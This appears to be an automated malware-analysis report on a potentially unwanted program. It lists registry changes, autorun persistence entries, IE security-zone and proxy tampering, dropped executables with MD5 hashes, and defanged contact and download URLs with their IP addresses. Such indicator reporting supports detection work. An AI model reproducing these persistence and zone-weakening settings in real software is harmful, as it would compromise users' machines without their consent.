[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID]
"(Default)" = "InetCtls.Inet"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib]
"(Default)" = "{48E59290-9880-11CF-9754-00AA00C00908}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C EA E8 E2 BE FA DA B2 7C 22 7A C3 70 CD 12 4F"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"(Default)" = "%System%\MSINET.OCX"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\MicroLab]
"Version" = "1208"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Internet Control URL Property Page Object"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32]
"(Default)" = "%System%\MSINET.OCX, 1"

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
"(Default)" = "Microsoft Internet Transfer Control 6.0 (SP6)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the PUP adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroLabCon" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe -yTJAOYH"

The PUP modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The PUP modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the PUP adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroLabProc" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe -yTJAOYH"

The PUP deletes the following registry key(s):

[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\VersionIndependentProgID]
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ToolboxBitmap32]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}]
[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\InprocServer32]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus\1]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\MiscStatus]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Programmable]
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}]
[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\ProgID]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Control]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Version]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\TypeLib]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352}]
[HKCR\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories]

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCR\CLSID\{48E59294-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"

[HKCR\CLSID\{48E59295-9880-11CF-9754-00AA00C00908}\InprocServer32]
"ThreadingModel"

The process %original file name%.exe:452 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 10 54 4D AA E0 DF 4E 06 C7 C6 83 F3 63 24 89"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The PUP modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The PUP modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The PUP modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process WinCtrCon.exe:1684 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\WinCtrView]
"Commit" = "N"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\WinCtrView]
"Upmom" = "Y"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\WinCtrView]
"firstTime" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\WinCtrView]
"Version" = "1681"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 2B E6 1E 08 B0 39 CE 4B 3C 9A 7C CB 67 D2 F9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\WinCtrView]
"MomDate" = "12/3/2014"

To automatically run itself each time Windows is booted, the PUP adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -HcSJXhQQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -HcSJXhQQ"

The PUP modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The PUP modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

"AutoConfigURL"
"ProxyOverride"

The PUP disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProProc"

The process WinCtrProc.exe:600 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCU\Software\WinCtrView]
"USER_NO" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\WinCtrView]
"Commit" = "Y"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\WinCtrView]
"ver" = "sup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\WinCtrView]
"firstTime" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\WinCtrView]
"Actdate" = "12/3/2014"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 59 E9 7D 88 F8 2C 06 33 0F 1B 88 A5 35 58 E0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the PUP adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WinCtrProc" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe -aukbpz"

The PUP modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The PUP modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The PUP modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the PUP adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WinCtrCon" = "%Documents and Settings%\%current user%\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe -aukbpz"

The PUP deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

"AutoConfigURL"

The PUP disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"

"MicroProProc"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroProCon"

"MicroProProc"

The process mscorsvw.exe:172 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"

The process irsetup.exe:956 makes changes in the system registry.
The PUP creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKCU\Software\MicroLab]
"Owner" = "admin"
"PDR" = "asdfaeiqwerh"
"USER_NO" = "3030"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\MicroLab]
"S_NO" = "3030"
"CURDIR" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"InstallLocation" = "%Documents and Settings%\%current user%\Application Data\MicroLab\SearchEngin\LanguageConvert"

[HKCU\Software\MicroLab]
"Upmom" = "Y"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\MicroLab]
"Version" = "0000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"Publisher" = "MicroNames"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\MicroLab]
"Commit" = "Y"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"Contact" = "MicroNames Support Department"

[HKCU\Software\MicroLab]
"SUBNAME" = "MAIN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe /U:%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\uninstall.xml"
"URLInfoAbout" = "http://www.hebogo.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 90 25 FF D9 64 64 77 86 DC 3E 88 7F C2 2E 26"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"HelpLink" = "http://www.hebogo.com"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\MicroLab]
"ver" = "sup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MicroNames Multi Language Convert Service3.0]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe"
"DisplayName" = "MicroNames Multi Language Convert Service"
"DisplayVersion" = "3.0"

To automatically run itself each time Windows is booted, the PUP adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicroLabCon" = "%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroLabProc" = "%ApplicationDataFolder%\MicroLab\MyEngin\Common\MicroProCon.exe"

Dropped PE files

MD5 File path
835a0b2dd393dbf486d6e84aa7e41f95 c:\Documents and Settings\"%CurrentUserName%"\Application Data\GuardSupport\GuardConvert.exe
a85474b0c3c1be97707e3fa74091421e c:\Documents and Settings\"%CurrentUserName%"\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe
fa1a41b05a5029cb2a500b1dbe2d17e8 c:\Documents and Settings\"%CurrentUserName%"\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe
3fe7c92dba5c9240b4ab0d6a87e6166a c:\Documents and Settings\"%CurrentUserName%"\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe
c3a2676fd2bec4903dea49c7e31f890b c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe
545ee651a6d3a161ec0e58f7cc7513c1 c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe
22a5ebecadefbe088ff9caa5549a22d7 c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe
3fe7c92dba5c9240b4ab0d6a87e6166a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe
545ee651a6d3a161ec0e58f7cc7513c1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrCon[1].exe
22a5ebecadefbe088ff9caa5549a22d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrProc[1].exe
fa1a41b05a5029cb2a500b1dbe2d17e8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\MicroProProc[1].exe
c3a2676fd2bec4903dea49c7e31f890b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\Uninstall_Ctr[1].exe
90a39346e9b67f132ef133725c487ff6 c:\WINDOWS\system32\MSINET.OCX
84742b5754690ed667372be561cf518d c:\WINDOWS\system32\VB6KO.DLL

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: Setup Factory 8.0 Runtime
Product Version: 8.2.1.0
Legal Copyright: Setup Engine Copyright (c) 2004-2009 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf80_launch.exe
Internal Name: suf80_launch
File Version: 8.2.1.0
File Description: Setup Application
Comments: Created with Setup Factory 8.0
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 28836 32768 4.26507 a8dbcac095aef6f1ff0f56e91c5abc15
.rdata 36864 10370 12288 3.44532 efb6029b9a5f70171975f6b5a16c78ce
.data 49152 6440 4096 1.54728 cf8d7dd9f4b828868db85743b8601f51
.rsrc 57344 28040 28672 4.06487 05962a2c16ea40395e7b662814eba9fd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 57
0e1bf09cea8e7cf2d8ff215b54ccc3ff
f3ce66c697219589c555b2bcaea2ec36
4505d9a1286f7e0139c339736549c04c
7724d3f50638529ce10ddce46d50b566
96e429733d0efca88ba8104c870597c5
670c94280fdc3b0cb140feae731d4c0d
fbfcdce934c48bdd5dc887d009f63d9a
60450ad8dbc5eb1a94e67560af5512f5
16e80409037afd6531a3c25648efd36a
49ecea57d92bc3f004d63a13998ed827
a49308a10aaee870b0df1a54629f8e17
60c64e1ff797f0586d4e4fa8b71590fb
662f48cd18a06ab7fa7a036c39dd5009
a05a82856ecb0e9f04dee5f2b945355c
c3150d4a50452db71ce563353ba982af
d96bf3515187f64e04bc30c105eeffaa
c0bf80b9314aec2b1dca0dcb2662f42d
4f2dafde6729cd7069faa9e1a06ecedb
1dc3cb8f363bde761d4cff6e874f7609
7228c9c464e45dfc0264a4019ca146fb
2597664b2e6285188d3d631b91994a18
75661c1238712c2f813f39573d17e3e7
0fbdc557bdaf578aaa19147db21e4012
43f8dcc02375f67a0e411919bd06b54a
e4c660519851bbe292368e3a7cb00ca9

URLs

URL IP
hxxp://mainserver.kr/Config/ServerList.asp?n=3030 220.73.162.57
hxxp://hostserver.kr/Config/ServerList.asp?uno=3030 220.73.162.54
hxxp://220.73.162.27/Config/FormChecktimemicroLab.asp
hxxp://220.73.162.46/Config/ProgramGuard.asp?uno=3030&ver=0000&wver=5
hxxp://220.73.162.27/Config/ProgramUpdateLab.asp?version=1208
hxxp://220.73.162.4/Download/MicroProProc.exe
